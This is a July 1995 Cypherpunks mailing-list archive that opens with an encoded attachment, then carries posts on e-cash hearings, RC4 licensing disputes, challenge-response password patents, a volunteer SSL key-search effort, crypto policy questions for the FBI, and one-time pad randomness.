M7D,\9'AXB+`\4%!T>#Q,/(1X>'AX>'AX>'AX/#QX>'A,H)2,F*B,?*B\6%B< MB,BLK(2PF'20L)C$D(B06%A8>&0\8'A8>%Q(<'@\.'`\L'AT='A44$QX9)QH M9&!8/%AXZ41#:%```$1#``E&"48)1 at E&"48,2( MF&N,7(Q+!XB&248)!XK'28 M=(ADJ'1V=)1 at E&"48)A8F%B86)A8J'B,7(Q*R0K'BL>*QTK'3(M9A4F%28 M5'10@%!T4'10D$R03)!,L'BP>+!XL'BP>+!XQ)R(9)!@>&"08```J'B(/*QX MF%1T4)!,B&2(9*AXK'2P>$Z0D)`\`'1TA$QO;WAXP7AT=+2T>$Q.9&1XM$P` M0T,`9&1^R&AHR,A^?GIZF,ADR&209`")N;EZ>L@``````$-D````````9``` MR`#(``!,^_\%`#(`(2H``/__6P```-8E```#`KT!```Q)@``!P!V````[B<` M``0"O0$``&0H``!#1R!4:6UE%@T5&AD.&Q<3&Q,0&!@0#Q<.*1T5&!@5#A$=%R( M8$Q86#18:.E(0U1$```X4'P```!#`#Q\?'Q\?`!D?&`P`)ALE&R8;)ALF&RX M7)1K?$Q\3'Q,?$Q40%1`5$!40*ATF%285)A4F%2D=*1TI'2D=(Q,F&R0;)A4 MF%2,3*!4=F"8;)ALF&R43)1,E$R43*!L?$Q\3'Q,?$R48)1 at E&"48)1 at E&"L M8*Q at 5#!4,%1`5#"?8%``G%QX.'@X>#AL/VPPJ'2HE*ATJ'285)A4R+6<5)Q4 MG%1 at .(`X8#A at .(!$@$2`1*1TI'2D=*1TI'2D=+R(C$QX6'A@>%@``*!L>#BH M=)Q48#B`1(Q,C$R@;)A4I'1.D)"0-`!L;'A0;V]H:,%H;&RIC(9,ADD&0`B;FY>GK(``````!#9````````&0` M`,@`R```3$-'(%1I;65S($)O;&0@*%-C86QA8FQE*0!'86QL:6%R9"U2;VUA M;B`Q,BXP<'0`1V%L;&EA&!\6```I&Q\0*A\H%QD/(!$E%245*1LG%BD?$Z0D)`T M`&QL@%!O;VAHQ&AL;)R<:$Y.9&1HG$X`0T,`9&1^R&!@R,A^?GIZF,ADR&20 M9`")N;EZ>L@``````$-D````````9```R`#(``!.^_\%`#(```````\`6@(` M`%,J``#__R$````C!@``"``"````K2P```````````````"R`04`D0`W`'H` M0P`[`"P!`0````%);%@">@#S&;@17P@````0('#L`%X0-Q+[`5@"D/[^_O[^ M_O[__O________[__________________________P8'#P"0`#@`;`!#`$,` M+`$!`!D``'(8`JO-1`0,`6`*8_O[^_O[^_O___________O______ M_O[^_O___________O[^_____P``9```R`#(``!,```````````````````` M```````````````````````````````````````````````````````````` M``````````````#_____`````````````````````````````````````.D` M2`!#`%0`1```````.`!0`'P`````````0P```#P`?`!\`'P`?`!\````9`!\ M`&``,```````T`OW`)`SV"2!E;G-U65A'1E;G-I;VX at 9F]R('1H92!$871A($5N8W)Y M<'1I;VX at 4W1A;F1A2`R,2"IJ2!4:&4 at 1&%T M82!%;F-R>7!T:6]N(%-T86YD87)D("A$15,I('-H;W5L9"!B90UR96-E2!N97<@8W)Y<'1O9W)A<&AY('-T86YD87)D+"!T M:&4 at 06UE2!S96YS:71I=F4 at 9&%T82!C;VUM M=6YI8V%T:6]N2!T:&%T('1H92!L;VYG97(@1$53(&ES('5S960L('1H92!M;W)E M(&QI:V5L>2!I=', at 8V]D92!C;W5L9"!B92!BFEN9R!T:&ES(&-O=6QD(&QI;6ET(&ET2!C;W-T;'D at 9'5E('1O('1H92!H:6=H M(&QE=F5L(&]F(&5L96-T2`H3DE3 M5"D@=&\@8V]N=&EN=64@=&\@96YD;W)S92!$15, at 87, at 82!&961E2!O;B!T M:&4 at 8V]M;65R8VEA;"!U2!!9V5N8WD@*$Y302D at 86YD(&9E M9&5R86P at 8F%N:VEN9R!A9V5N8VEE7!T;PUE>'!E2X@"L$""`<( M!Q``P5-P96-I9FEC86QL>2P at 04)!(')E8V]M;65N9&5D. at K!`@@'"`<0`,'` M`@3`("!4:&4 at 9FEN86YC:6%L('-E2!F2!A=F%I;&%B;&4-P0((!P@'$`#! M86QG;W)I=&AM7-T96US(&9O M7,@ M=V]U;&0@:&%V92!T;R!B92!S=&]R960@;W5T7!T;V=R M87!H:6,@:V5Y2!M86YA9V5M96YT M(&%N9`W!`@@'"`<0`,%C;VYT:6YU92!T;R!C;V]P97)A=&4@=VET:"!G;W9E M7!T;V=R87!H>2!F;W(@9FEN86YC:6%L(&%P<&QI8V%T:6]N2!F;W(@ M=&AE(&-O;6UE7!T;V=R87!H>2P@:6YS=&5A9"!O M9B!B96EN9R!C87)R:65D(&]U="!S;VQE;'D-P0((!P@'%`#!8GD at 17AE8W5T M:79E($]R9&5R+ at K!`@@'"`<4`,%;3F]T93H@(%1H97-E(')E8V]M;65N9&%T M:6]N2!B M86YK&EM871E;'D at .3`@<&5R8V5N="!O9B!T M:&4-8V]M;65R8VEA;"!B86YK:6YG(&EN9'5S=')Y)W,@=&]T86P at 87-S971S M+"!A;F0 at 86)O=70 at .30@<&5R8V5N="!O9B!!0D$@;65M8F5R Ahem. One more time... >WASHINGTON (AP) A day in the financial life of a future consumer may >begin something like this: Wake up, log in, download some e-cash into >your PC's hard drive, then go cruise the virtual mall. > >It's on the verge of happening, experts told Congress on Tuesday. But >some caution that, without planning and coordination, the brave new >Internet world of a cashless, checkless society could turn into an >electronic "Tower of Babel." > >"On the Internet ... it is difficult to tell if a transaction has taken >place since there is no central authority to track and report it," said >David M. Van Lear, chief executive of Electronic Payment Services Inc., >a 2 1/2-year-old joint venture of four banks. > >"There are currently no standard operating regulations," he said. "In >addition, there is no central authority to track and report on criminal >activity, including counterfeiting and money laundering." > >It was all a bit mind-boggling for members of the House Banking monetary > policy subcommittee, whose chairman, Rep. Michael Castle, R-Del., >observed, "Some of us can barely read our e-mail." > >But, more than 25,000 merchants in 150 countries are already on the >Internet, selling or advertising products and services to 20 million >users, a figure that will grow to 100 million within five years, >according to MasterCard International. > >So, Castle said, "it is time for lawmakers to start grappling with the >implications of �an entirely new monetary system in cyberspace, one that > transcends national governments and national boundaries." > >For instance, how will the Federal Reserve Board measure the amount and >velocity of money flowing through the Internet? How will the Internal >Revenue Service audit transactions conducted anonymously without paper >records? What laws apply when a U.S. consumer orders a product from a >business overseas and the goods never arrive? > >The lawmakers received seemingly conflicting advice from a panel of >experts that included Van Lear, executives from MasterCard and Visa >U.S.A. and Scott Cook, the chairman of the personal finance software >company, Intuit Inc. > >They were told that government will be crucial to fostering stability of > the new electronic monetary system and public trust in it but that >premature or too much regulation could stifle innovation. > >The new technology, the experts said, will both open new avenues for >fraud and offer new protections and safeguards. > >The system, some said, needs to be fully auditable so tax and criminal >authorities can reconstruct a series of transactions but it also should >protect Americans� privacy. > >For instance, David Chaum, the pony-tailed chairman of DigiCash Inc., >said his version of electronic cash, or e-cash, would provide the same >privacy protection and anonymity in small transactions as traditional >cash. > >Using encrypted codes and special software that offer much more security > than the current unprotected transfer of credit card information via >the Internet, consumers could download cash into the hard drive of their > personal computers. > >They'd spend it by transferring it to merchants via computer. Or they >could store the cash on "smart cards" equipped with a computer chip >capable of storing far more information than the magnetic strips now on >credit and debit cards. > >The cards then would function like pocket money and could be used in >vending machines, parking meters and subway turnstiles equipped to >receive them. > >MasterCard International and Visa are developing similar smart cards >but, unlike Chaum's, theirs would generate an audit trail that could >help law enforcement officials combatting tax evasion, counterfeiting >and money laundering. > >Rosalind L. Fisher, executive vice president of Visa, a consortium of >financial institutions, urged Congress to maintain public confidence in >new forms of electronic payment by allowing them to be offered only >through institutions to supervision by banking regulators. > >At the same time, she said, �we are concerned that additional regulation > in this area will "stifle innovations ... subjecting many of these >products to ... premature death." > >By way of example, she cited a Federal Reserve regulation that, if >applied, could require machines accepting smart cards to issue paper >receipts, ruining the economic viability of the cards for such small >purchases as a 75-cent soda. > >Castle, who plans at least one more hearing on the future of money this >fall, agreed that Congress should hold off on legislating for now but >should be prepared to move quickly if problems develop. > >"I don�t think we need regulations now, but we had better be ready to >respond ... if some guy can crack a code and create a million-dollar >account, transfer it around a couple times and end up in the Bahamas," >he said. > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From mkj at october.ducktown.org Wed Jul 26 11:40:15 1995 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Wed, 26 Jul 95 11:40:15 PDT Subject: NRC panel wants questions for Law Enforcement on crypto policy Message-ID: <199507261746.NAA00249@october.ducktown.org> ----- Forwarded message from David Lesher ----- >In April, gnu asked: >> Herb Lin called today to ask if the Cypherpunks could come up with a >> list of questions for their panel to ask the law enforcement community >> about crypto policy. They will be meeting with senior law enforcement >> officials like FBI Director Freeh a week or so from now. > >Did we ever get any feedback on this? > >- -- >A host is a host from coast to coast.................wb8foz at nrk.com >& no one will talk to a host that's close........[v].(301) 56-LINUX >Unless the host (that isn't close).........................pob 1433 >is busy, hung or dead....................................20915-1433 ----- End of forwarded message from David Lesher ----- I'm glad you brought that up. Having contributed some questions myself, I was hoping to get some kind of feedback. I didn't expect transcripts of any top-secret meetings or anything, but the whole subject seems to have fallen into a black hole; we don't even know whether the meetings ever took place. If possible, it would be great to hear at least general reactions to at least some of the questions and issues we raised. John, did anything ever come of this? Do you have any info at all? --- mkj From rross at sci.dixie.edu Wed Jul 26 12:38:46 1995 From: rross at sci.dixie.edu (Russell Ross) Date: Wed, 26 Jul 95 12:38:46 PDT Subject: RC4 Message-ID: >From: Alex Tang >> I talked with RSA yesterday specifically about free servers and RC4. >> They just said that they would need a business plan for the >> server product. When i said that the product would be free, they started >> talking in circles about how everyone who uses RC4 needed a license (but i >> was asking about the licenses...) I asked flat out "how much would a >> license for RC4 cost for a free server product". They only reponded with >> "Very Expensive", and then went on about a business plan. > >Ask them about the free version of RC4 which is circulating. If they say >it is patented ask them for the patent number. Ask them why you should >pay them big bucks if you can get it for free. Here's their reply to a similar correspondence: >The RC4 algorithm is copyrighted by and intellectual property of RSA Data >Security. For use of this algorithm in a product or service you plan to >sell, you may use the RC4 software implementation from our BSAFE toolkit. >Licenses are not available for other commercial software implementations of >this algorithm other than what is included in our BSAFE toolkit. I wasn't aware that you could copyright an algorithm. Patent, yes, but not copyright. Intellectual property meens secret, right? Aren't there any precendence cases involving propriety schemes that are reverse engineered? I know there have been, I just can't remember what they are. In any case, RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and even if they lose there are considerable legal fees involved for whoever tries it. What if a bunch of people put secure HTTPd servers online at the same time, without any clear trail pointing to the first one? If the RC4 code really is legal to use, this would make it hard for RSADSI to pinpoint anyone to sue, thus eliminating the intimidation factor. By the way, since RSA is such a vocal opponent of the Clipper chip on the grounds of its secret Skipjack algorithm, why does it market secret algorithms like RC4 and RC2? Does this seen like a double face to anyone else? ----------------------------------------------------------- Russell Ross email: rross at sci.dixie.edu 1260 N 1280 W voice: (801)628-8146 St. George, UT 84770-4953 From stewarts at ix.netcom.com Wed Jul 26 12:48:32 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 26 Jul 95 12:48:32 PDT Subject: Challenge-response passwords (Was: big word listing) Message-ID: <199507261944.MAA20832@ix9.ix.netcom.com> At 06:59 PM 7/25/95 +0100, Andrew Spring wrote: >Free-after-1997 example: > g is a generator of a prime p. > password is X (0 password file has g^X mod p. > login server generates Y, issues challenge g^Y. > expected response is g^XY mod p > login client has X, generates (g^Y)^X = g^XY mod p. > J. Random SuperHacker can get g^X, and g^Y, but not g^XY. It's _not_ free after 1997! I thought of it last fall, was surprised I couldn't find it anywhere in the literature, given that it's pretty obvious, but eventually found that a guy from Siemens had patented it in Germany and then gotten a US patent in ~1994. Unfortunately, he phrased it in terms of "commutative hash functions", with g^X mod p as an example, so it's more general. He also extended it to do two-way authentication (obviously the process can be symmetrical if the user has a stored g^W from the server and can send a challenge, but he found a way to save a step or two.) I developed it because I was looking for a way to do authentication-only public key stuff so the code would be exportable - this approach doesn't generate a shared secret (since the otherwise-secret g^XT is exposed as the response to the challenge.) However, it's possible to extend it to preserve the shared secret - instead of sending response g^XY mod p, send Hash(g^XY mod p) and have the login server validate that. One advantage is that the hash can be much shorter than the whole g^XY mod p, e.g. 32-64 bits instead of 512-1024. And you can now use (g^XY mod p) as a session key (for encrypted sessions) or an authenticator (e.g. send Hash(Data,sequence#,sessionkey) as a MAC for each packet. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A Message-ID: <9507261950.AA28199@snark.imsi.com> Russell Ross writes: > In any case, > RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and > even if they lose there are considerable legal fees involved for whoever > tries it. I'll just have to put it into my IPSP implementation, then. I am more than willing to pay a few tens of thousands to lawyers for this particular purpose. I will produce a text description of the algorithm and have an intern re-implement it from scratch just to make sure -- I'll probably prepare some notarized documents attesting to the development methodology, too. It will be fun to see if Jim Bidzos actually tries to pull something under those circumstances. Perry From gnu at toad.com Wed Jul 26 12:51:31 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 26 Jul 95 12:51:31 PDT Subject: NRC panel wants questions for Law Enforcement on crypto policy In-Reply-To: <199507261746.NAA00249@october.ducktown.org> Message-ID: <9507261951.AA23210@toad.com> I collated all the questions into a large ungainly message and sent it to Herb Lin. He has been after me to go back over it and make a more useful set of questions, which I haven't done yet. He says they are meeting with the FBI in September and want to get questions to them in August (incorporating our ideas). I've promised him I will get him the formatted list of questions by the end of next week. John From perry at imsi.com Wed Jul 26 12:52:52 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 26 Jul 95 12:52:52 PDT Subject: Challenge-response passwords (Was: big word listing) In-Reply-To: <199507261944.MAA20832@ix9.ix.netcom.com> Message-ID: <9507261952.AA28574@snark.imsi.com> Bill Stewart writes: > It's _not_ free after 1997! I thought of it last fall, was > surprised I couldn't find it anywhere in the literature, given that > it's pretty obvious, but eventually found that a guy from Siemens > had patented it in Germany and then gotten a US patent in ~1994. > Unfortunately, he phrased it in terms of > "commutative hash functions", with g^X mod p as an example, so it's more > general. Given all the prior art, I have a solid suspicion that the patent wouldn't hold up. The existance of the publically published Diffie Hellman patent, for instance, makes it rather hard to patent the more general case. Perry From rross at sci.dixie.edu Wed Jul 26 13:03:13 1995 From: rross at sci.dixie.edu (Russell Ross) Date: Wed, 26 Jul 95 13:03:13 PDT Subject: RC4 Message-ID: >From: Alex Tang >> I talked with RSA yesterday specifically about free servers and RC4. >> They just said that they would need a business plan for the >> server product. When i said that the product would be free, they started >> talking in circles about how everyone who uses RC4 needed a license (but i >> was asking about the licenses...) I asked flat out "how much would a >> license for RC4 cost for a free server product". They only reponded with >> "Very Expensive", and then went on about a business plan. > >Ask them about the free version of RC4 which is circulating. If they say >it is patented ask them for the patent number. Ask them why you should >pay them big bucks if you can get it for free. Here's their reply to a similar correspondence: >The RC4 algorithm is copyrighted by and intellectual property of RSA Data >Security. For use of this algorithm in a product or service you plan to >sell, you may use the RC4 software implementation from our BSAFE toolkit. >Licenses are not available for other commercial software implementations of >this algorithm other than what is included in our BSAFE toolkit. I wasn't aware that you could copyright an algorithm. Patent, yes, but not copyright. Intellectual property meens secret, right? Aren't there any precendence cases involving propriety schemes that are reverse engineered? I know there have been, I just can't remember what they are. In any case, RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and even if they lose there are considerable legal fees involved for whoever tries it. What if a bunch of people put secure HTTPd servers online at the same time, without any clear trail pointing to the first one? If the RC4 code really is legal to use, this would make it hard for RSADSI to pinpoint anyone to sue, thus eliminating the intimidation factor. By the way, since RSA is such a vocal opponent of the Clipper chip on the grounds of its secret Skipjack algorithm, why does it market secret algorithms like RC4 and RC2? Does this seen like a double face to anyone else? ----------------------------------------------------------- Russell Ross email: rross at sci.dixie.edu 1260 N 1280 W voice: (801)628-8146 St. George, UT 84770-4953 From jlasser at rwd.goucher.edu Wed Jul 26 13:12:51 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Wed, 26 Jul 95 13:12:51 PDT Subject: RC4 In-Reply-To: Message-ID: On Wed, 26 Jul 1995, Russell Ross wrote: > I wasn't aware that you could copyright an algorithm. Patent, yes, but not > copyright. Intellectual property meens secret, right? Aren't there any > precendence cases involving propriety schemes that are reverse engineered? > I know there have been, I just can't remember what they are. There was one a few years back with a special chip in Nintendo cartridges that you needed to buy from them... it was against a company called Atari (no, not THAT atari (i think)), and was decided in Atari's favor. Hope that helps... Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From altitude at umich.edu Wed Jul 26 13:35:11 1995 From: altitude at umich.edu (Alex Tang) Date: Wed, 26 Jul 95 13:35:11 PDT Subject: RC4 In-Reply-To: Message-ID: <199507262034.QAA18609@petrified.cic.net> On Wed Jul 26 16:09:38 1995: you scribbled... > > >Ask them about the free version of RC4 which is circulating. If they say > >it is patented ask them for the patent number. Ask them why you should > >pay them big bucks if you can get it for free. > > Here's their reply to a similar correspondence: > > >The RC4 algorithm is copyrighted by and intellectual property of RSA Data > >Security. For use of this algorithm in a product or service you plan to > >sell, you may use the RC4 software implementation from our BSAFE toolkit. > >Licenses are not available for other commercial software implementations of > >this algorithm other than what is included in our BSAFE toolkit. > > I wasn't aware that you could copyright an algorithm. Patent, yes, but not > copyright. Intellectual property meens secret, right? Aren't there any > precendence cases involving propriety schemes that are reverse engineered? > I know there have been, I just can't remember what they are. In any case, > RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and > even if they lose there are considerable legal fees involved for whoever > tries it. What if a bunch of people put secure HTTPd servers online at the > same time, without any clear trail pointing to the first one? If the RC4 > code really is legal to use, this would make it hard for RSADSI to pinpoint > anyone to sue, thus eliminating the intimidation factor. So, does anyone know for certain if this is the true letter of the law? Since RC4 has been reverse engineered (or leaked) to the public, do they have any claim on it if there is no patent? Seeing the legal web that surrounds a lot of the current crypto situation in the US, it's not surprising that RSA would try to smoke screen everyone into thinking that there would be a clear violation (prosecutable by law) if anyone used RC4 without getting a license. (It's also not surprising that no one's tried as well...) ...alex... Alex Tang altitude at cic.net http://petrified.cic.net/~altitude CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer Viz-It!: Software Developer (Check out http://vizit.cic.net) UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500) From pitz at onetouch.com Wed Jul 26 13:48:40 1995 From: pitz at onetouch.com (greg pitz) Date: Wed, 26 Jul 95 13:48:40 PDT Subject: Crypto Law Survey Message-ID: <9507262045.AA18413@onetouch.com> On Wed, 26 Jul 1995 15:28:43 Michael Froomkin wrote: > few years. Second, the American Bar Association Section on > Science and Technology's Information Security Committee is > drafting Guidelines and Model Legislation which, if they are > ever completed, will improve upon the Utah initiative. Would someone be so kind as to describe the Utah initiative? I wasn't able to find a further description in my percursory search of Mr Froomkin's otherwise very informative home page http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html ................... pitz at onetouch.com greg pitz .. From sdw at lig.net Wed Jul 26 13:51:45 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 26 Jul 95 13:51:45 PDT Subject: RC4 In-Reply-To: Message-ID: > > On Wed, 26 Jul 1995, Russell Ross wrote: > > > I wasn't aware that you could copyright an algorithm. Patent, yes, but not > > copyright. Intellectual property meens secret, right? Aren't there any > > precendence cases involving propriety schemes that are reverse engineered? > > I know there have been, I just can't remember what they are. > > There was one a few years back with a special chip in Nintendo cartridges > that you needed to buy from them... it was against a company called Atari > (no, not THAT atari (i think)), and was decided in Atari's favor. There has only been one company called "Atari". They did split between home computers and video games/PC game software when Jack Tramiel left Commodore and bought Atari. I thought that it wasn't decided in Atari's favor, but maybe I didn't hear the final word. I believe that they used a form of rom access that they had patented and restricted producers by only licensing roms to those they wanted. If I remember, it had something to do with address auto-increment. I always wondered how the 'Game Genie' people got enough information to do what they did. (A true 'wedge' cartridge that you could program codes into for all games to give extra lives, hard to find abilities, change parameters, etc.) > Hope that helps... > Jon > ------------------------------------------------------------------------------ > Jon Lasser (410) 494-3253 > Visit my home page at http://www.goucher.edu/~jlasser/ > You have a friend at the NSA: Big Brother is watching. Finger for PGP key. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From trei Wed Jul 26 14:08:52 1995 From: trei (Peter Trei) Date: Wed, 26 Jul 95 14:08:52 PDT Subject: SSL challenge? Message-ID: <9507262108.AA25550@toad.com> Where does the effort to bruteforce SSL stand? I've got a bunch of P5/90s ready and waiting. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From jweis at primenet.com Wed Jul 26 14:11:57 1995 From: jweis at primenet.com (Jason Weisberger) Date: Wed, 26 Jul 95 14:11:57 PDT Subject: RC4 In-Reply-To: Message-ID: <199507262111.OAA14809@usr2.primenet.com> > >The RC4 algorithm is copyrighted by and intellectual property of RSA Data > >Security. For use of this algorithm in a product or service you plan to > >sell, you may use the RC4 software implementation from our BSAFE toolkit. > >Licenses are not available for other commercial software implementations of > >this algorithm other than what is included in our BSAFE toolkit. > > I wasn't aware that you could copyright an algorithm. Patent, yes, but not > copyright. Intellectual property meens secret, right? Aren't there any > precendence cases involving propriety schemes that are reverse engineered? > I know there have been, I just can't remember what they are. In any case, > RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and > even if they lose there are considerable legal fees involved for whoever > tries it. What if a bunch of people put secure HTTPd servers online at the > same time, without any clear trail pointing to the first one? If the RC4 > code really is legal to use, this would make it hard for RSADSI to pinpoint > anyone to sue, thus eliminating the intimidation factor. RSA wants money (this comes from speaking with an RSA sales guy - Dave Garifolio, who incidentially sends out really neat RSA folders full of info you can take out of the folder and put elsewhere leaving you a cool folder) for the toolkit, thats all. They send you to some sister corp of theirs and then charge you for the license. Dave tells me there might be a chance you could buy one kit from RSA, design the server and anyone who wanted to use it could pay something like a $300.00 fee to lic. the thing. However, in the aformentioned folder, Dave sent me all kinds of "we want big cash" paperwork, which I have yet to read (as anything you've gotta put in a really cool folder to get me to read can't be worth the time out from sleeping.) > > By the way, since RSA is such a vocal opponent of the Clipper chip on the > grounds of its secret Skipjack algorithm, why does it market secret > algorithms like RC4 and RC2? Does this seen like a double face to anyone > else? > Uh, yeah. Jason Weisberger jweis at primenet.com http://198.147.97.19/~jweis From Piete.Brooks at cl.cam.ac.uk Wed Jul 26 14:53:21 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Wed, 26 Jul 95 14:53:21 PDT Subject: SSL challenge? In-Reply-To: <9507262108.AA25550@toad.com> Message-ID: <"swan.cl.cam.:090810:950726215000"@cl.cam.ac.uk> > Where does the effort to bruteforce SSL stand? Andy has the spec wrapped up, and is finalising his Windows 32 Client. I have the key doler running, a perl client and a shell driving script, along with a new WWW interface (which we hope won't be used much) Adam has bruterc4 tweaked to interact with my perl client. Andrew has a copy of bruterc4 and is making brutessl similar. We're all ready to go, but I'm off for three weeks, and as Adam will be taking over my stuff in my absence, it might take him a while to understand it and make the few last minute tweaks .... From adam at bwh.harvard.edu Wed Jul 26 15:19:04 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 26 Jul 95 15:19:04 PDT Subject: NRC panel wants questions for Law Enforcement on crypto policy In-Reply-To: <9507261951.AA23210@toad.com> Message-ID: <199507262218.SAA00901@bwnmr5.bwh.harvard.edu> | I collated all the questions into a large ungainly message and sent it | to Herb Lin. He has been after me to go back over it and make a more | useful set of questions, which I haven't done yet. He says they are | meeting with the FBI in September and want to get questions to them in | August (incorporating our ideas). I've promised him I will get him the | formatted list of questions by the end of next week. A question that might be interesting to add would be "Given the intense difficulties in replacing the DES, why does Clipper have an 80 bit key? Wouldn't it make more sense to design a standard that will at least resist brute force attacks for longer?" I understand there are difficulties in projecting computing power that far ahead, as well as guessing at the actual improvement in mathematical and cryptographic theory, but why not have a standard with a 128 bit key? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From stewarts at ix.netcom.com Wed Jul 26 15:53:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 26 Jul 95 15:53:19 PDT Subject: Hey, you're back? Message-ID: <199507262250.PAA00754@ix4.ix.netcom.com> Hi, Strick, I see you're back on the list - how was Europe? Are you back out west, or just dialing in from somewhere? Bill #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A Message-ID: <199507262348.AA23992@tyrell.net> Reply-To: perry at imsi.com X-Reposting-Policy: redistribute only with permission Date: Wed, 26 Jul 1995 15:52:36 -0400 From: "Perry E. Metzger" Given all the prior art, I have a solid suspicion that the patent wouldn't hold up. The existance of the publically published Diffie Hellman patent, for instance, makes it rather hard to patent the more general case. Perry Does anyone know if that patent on distributed file systems that was filed in '82 and granted sometime recently held up in court? The last I heard the guy was going around collecting royalty payments from large companies unwilling to go to court anyway. Is this the sort of thing it's easier for a small company to challenge than a big company? Phil From jya at pipeline.com Wed Jul 26 17:01:48 1995 From: jya at pipeline.com (John Young) Date: Wed, 26 Jul 95 17:01:48 PDT Subject: WIL_mil Message-ID: <199507262341.TAA26317@pipe4.nyc.pipeline.com> Garry Wills, the historian, writes a thought-provoking essay in The New York Review of Books, August 10, 1995, on "The New Revolutionaries," about the militants and the political and social grievances that undergird their movement -- many of which are shared, Will states, by a wide spectrum of the populace discontented with the government: The suspicion that government has become the enemy of freedom, not its protector, crosses ideological lines. Liberals point to FBI plots against American citizens like Dr. King, to CIA experiments with LSD on American citizens, to the Defense Department's use of Americans as guinea pigs in nuclear testing. The right sees assaults on liberty from the Bureau of Alcohol, Tobacco and Firearms, the Department of the Interior, the Occupational Safety and Health Administration. Many people resent the fact that government has become a dictator of the terms of societal conduct -- in welfare programs, in affirmative action and other preferential attitudes toward citizens' rights, in schools that seem to have a "multicultural" or antireligious agenda, in confiscatory taxation, in the keeping of elaborate files on citizens' activities, in various agencies' surveillance techniques and bribing of informers. Wills goes on to review these grievances: Taxation. The jury system. Regulations. Police power. Schools. Family. Religion. Citizen militias. Constitutionalism. Corruption. Guns -- discussed at length. And, he summarizes in closing: With the end of the cold war, the justification for government activism has been taken away. If the government is only good for fighting Communists, and it no longer fights Communists, then what good is it? No convincing answer comes from above -- which lends the answer from the depths its new plausibility: It is good for nothing, and citizens must take their own lives in hand again, vindicating their own liberties. Right or wrong, the armed patriots at least have arguments they can believe in wholeheartedly. They take the mood of post-cold war drift, of Perotista resentment, of disillusionment and economic shakiness, of fin de siecle fear, and change it into a plan for doing something about one's gripes. The militias and their supporters are not the most central social symptom of our time, but they are among the more dramatic symptoms of a general crisis of legitimacy. The authority of government can no longer be assumed. It has to be justified from the ground up. Many people who are not militants or conspiratorialists can agree with parts of this analysis. Libertarians wonder why people who keep to themselves should be bothered. It is no longer so "extreme" to believe that our government is the greatest enemy to freedom. We see this in a new hatred of government agents (who fear for their lives in western states). Or in the unprecedented vilification of the head of our government. The fierce contempt for Hillary Rodham Clinton, for the Attorney General (called "Butch" Reno on bumper stickers), for "Condom Queen" Joycelyn Elders, reflects misogyny rebelling against feminism's gains; but it is also a sign that the office of the presidency itself may now incur a contempt as routine as the respect it once commanded. The heaping of filth on the personnel and symbols of government has a delegitimating effect in itself; and the assault is joined to the disillusion, anger, and disorientation that have marked recent electoral behavior. Where the heated deny legitimacy and the cool are doubtful of it, a crisis is in the making. WIL_mil (about 50K, in 3 parts) From Ulf.Moeller at hamburg.netsurf.de Wed Jul 26 17:20:41 1995 From: Ulf.Moeller at hamburg.netsurf.de (Ulf Moeller) Date: Wed, 26 Jul 95 17:20:41 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Message-ID: In the book I mentioned there is a quotation of D. Kahn, The Codebreakers, from 1967: "Interestingly, some pads seem to be produced by typists and not by machines. They show strike-overs and erasures - neither likely to be made by machines. More significant are analsyses of the digits. One such pad, for example, has seven times as many groups in which digits in the 1-to-5 group alternate with digits in the 6-to-0 group, like 18293, as a purely random arrangement would have. This suggests that the typist is striking alternately with her left hand (which would type the 1-to-5 group on a Continental machine) and her right hand (which would type the 6-to-0 group). Again, instead of just half the groups beginning with a low number, which would be expected in a random selection, three quarters of them do, possibly because the typist is spacing with her right hand, then starting a new group with her left. Fewer doubles and triples appear than chance expects. Possible the girls, ordered to type at random, sensed that some doublets and triplets would occur in a random text but, misled by their conspiciousness, minimized them. Despite these anomalies, however, the digits still show far too little pattern to make cryptanalysis possible." -- Ulf M�ller * um at ulf.mali.sub.org * 3umoelle at informatik.uni-hamburg.de PGP key fingerprint: B6 4F 97 28 8F C0 54 C3 A6 10 02 2F B9 31 78 14 "When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!" From AlanPugh at MAILSRV2.PCY.MCI.NET Wed Jul 26 17:36:46 1995 From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh) Date: Wed, 26 Jul 95 17:36:46 PDT Subject: connectsoft & encryption 